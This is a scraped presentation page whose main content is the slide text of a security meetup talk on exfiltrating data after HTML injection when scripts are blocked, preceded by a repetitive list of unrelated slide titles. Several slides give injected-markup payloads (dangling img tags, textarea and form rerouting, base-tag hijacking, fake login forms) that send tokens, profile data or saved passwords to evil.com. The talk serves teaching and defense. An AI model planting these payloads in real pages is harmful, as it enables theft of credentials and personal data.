Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DayH2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 

Postcards from the post xss world- content exfiltration null

  • 1. Postcards from the post-XSS world- Content Exfiltration technique. By : Piyush Pattanayak Null Chennai Meet
  • 2. Introduction to XSS • Type of injection attack, in which malicious scripts are injected into otherwise benign and trusted web sites. • Occur when an attacker uses a web application to send malicious code generally in the form of a client side script, to a different end user. • Flaws that allow these attacks to succeed are prevalent in most web application that utilize user input and generate output without adequate validation or encoding of user input. • An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to determining that the script should not be trusted, and will execute the script. • Thus giving the malicious script access to cookies, and other sensitive information retained by the browser for use by the site. These scripts can also rewrite the HTML content. Null Chennai Meet
  • 3. How to test for XSS • XSS should be tested in anything that accepts user input and displays it in the webpage, after rendering it. XSS attacks are successful because most programmers do not apply HTML encoding to the user input, trusting the user input as received. • E.g.: If a user enters “<script>alert (document. Cookie)</script>” in a text filed which upon submission may be rendered as a script tag thus producing a popup alert message with the cookies. • There are plenty of other XSS vectors and information about XSS which you can find out at OWASP. Null Chennai Meet
  • 4. Introduction to Post XSS • What ? – Very Similar to the XSS. • Why POST XSS? – Browser-level efforts to improve the security of web applications focuses on the containment of attacker-originating scripts. – Content Security Policy, removes the ability to inline JavaScript code in a protected HTML document. – Whitelisting of permissible sources for any externally-loaded scripts. – Related approaches, such as the No Script add-on, the built-in XSS filters in Internet Explorer and Chrome, client-side APIs such as toStaticHTML(...), or the HTML sanitizers built into server-side frameworks, also deserve a note. Null Chennai Meet
  • 5. Content Exfiltration • Goals of a successful XSS attack is the extraction of user-specific secrets from the vulnerable application. • Historically, XSS exploits sought to obtain HTTP (session) cookies. • The introduction of httponly cookies greatly limited this possibility. • In an application where theft of HTTP cookies is not practical, exfiltration attempts are usually geared towards the extraction of any of the following: – Personal Data – Tokens used to defend against cross-site request forgery attacks. – Capability-bearing URLs Null Chennai Meet
  • 6. Several Exfiltration Strategies • Dangling markup injection • <textarea>-based consumption • Rerouting of existing forms • Use of <base> to hijack relative URLs • Form injection to intercept browser-managed passwords • The limits of exfiltration defenses Null Chennai Meet
  • 7. 1. Dangling markup injection • Injection of non-terminated markup which will consume a significant portion of the subsequent HTML syntax, until the expected terminating sequence is encountered. • Opposite quote. • Scenario : If we are allowed to inject anything in the HTML content above the sensitive data which we need to steal. • Example : – <img src='http://evil.com/log.cgi? ← Injected line with a non-terminated parameter ... <input type="hidden" name="xsrf_token" value="12345"> ... ' ← Normally-occurring apostrophe in page text ... </div> http://nullcon.net/
  • 8. Dangling markup injection cont.. • Limitation : Injection point to appear before the sensitive data to be extracted • If governed by pure chance, this condition will be met in 50% of all cases. • Demo : Dangling Markup Injection http://null.co.in/ http://nullcon.net/
  • 9. 2. <textarea>-based consumption • Previous method had some limitation like matching quote character. • Injection of a text area. • Scenario: If there is combination of single and quote present before the sensitive data which we want to steal. • Can be injected before or after the legitimate form tag. • Example : – <form action='http://evil.com/log.cgi'><textarea> ← Injected line ... <input type="hidden" name="xsrf_token" value=‘12345’> ... (EOF) http://null.co.in/ http://nullcon.net/
  • 10. <textarea>-based consumption cont.. • Limitation : In contrast to the previous method, a degree of user interaction is needed to exfiltrate the data. • Victim has to submit the form by some means. • Forms with auto-submit capabilities are being considered for HTML5. Such a feature may unintentionally assist with the automation of this attack in future browsers. • Demo : <textarea>-based consumption http://null.co.in/ http://nullcon.net/
  • 11. 3. Rerouting of existing forms • This works because <form> tag cannot be nested. • Scenario : If we can inject any thing on top of a existing form tag. • This allows the attacker to change the action URL to which any existing form will be submitted. • Example : – <form action='http://evil.com/log.cgi'> ← Injected line ... <form action='update_profile.php'> ← Legitimate, pre-existing form ... <input type="text" name="real_name" value="John Q. Public"> ... </form> http://null.co.in/ http://nullcon.net/
  • 12. Rerouting of existing forms cont.. • Interesting when used to target forms automatically populated with user-specific secrets.  • Demo : Rerouting of existing forms http://null.co.in/ http://nullcon.net/
  • 13. 4. <base> to hijack relative URLs • Injection of <base> tags. • Able to change the semantics of all subsequently appearing relative URLs. • Scenario: If we are allowed to insert on the top of the form element. • Example : – <base href='http://evil.com/'> ← Injected line ... <form action='update_profile.php'> ← Legitimate, pre-existing form <form action=''http://evil.com/update_profile.php'> ... <input type="text" name="real_name" value="John Q. Public"> ... </form> http://null.co.in/ http://nullcon.net/
  • 14. <base> to hijack relative URLs cont.. • Demo : <base> to hijack relative URLs http://null.co.in/ http://nullcon.net/
  • 15. 5. Form injection to intercept browser-managed passwords • Browsers have features to remember username and password for websites. • Browsers auto fill the fields after matching the domain, id and name parameters of the fields. • We can inject a form into a domain using previous exfiltration techniques, to steal the user credentials. • Example : – <form action="http://www.evil.com" method="POST"> <input type="text" id="username" name="username"> <input type="password" id="password" name="password"> </form> http://null.co.in/ http://nullcon.net/
  • 16. Form injection to intercept browser-managed passwords cont.. • We can specify GET instead of POST and submit the credentials to a selected same-site destination. • That destination may links to third-party sites (thus leaking the credentials in the Referer header). • Or echo the parameter in the page. http://null.co.in/ http://nullcon.net/
  • 17. 6. Addendum: The limits of exfiltration defenses • All our previous vector redirects to the attacker domain. • If the developer wishes to restrict the set of permissible destinations for markup such as <form>, <a href=...>, or <img> to his own domain. • However, any attempts to prevent exfiltration, even in script-less environments, are unlikely to be successful. • Exfiltration attempts do not have to be geared toward relaying the data to a third-party website. • Moving data from private place to public place all within the scope of a single website is also sufficient. http://null.co.in/ http://nullcon.net/
  • 18. Addendum: The limits of exfiltration defenses cont.. • Example : – <form action='/post_review.php'> <input type='hidden' name='review_body' value=" ← Injected lines ... Your current shipping address: ← Existing page text to be exfiltrated 123 Evergreen Terrace Springfield, USA ... <form action="/update_address.php"> ← Existing form (ignored by the parser) ... <input type="hidden" name="xsrf_token" value="12345"> ← Token valid for /update_address.php and /post_review.php ... </form> • Demo : Addendum: The limits of exfiltration defenses http://null.co.in/ http://nullcon.net/
  • 19. Reference • http://lcamtuf.coredump.cx/postxss/ http://null.co.in/ http://nullcon.net/
  • 20. Thank You Q&A http://null.co.in/ http://nullcon.net/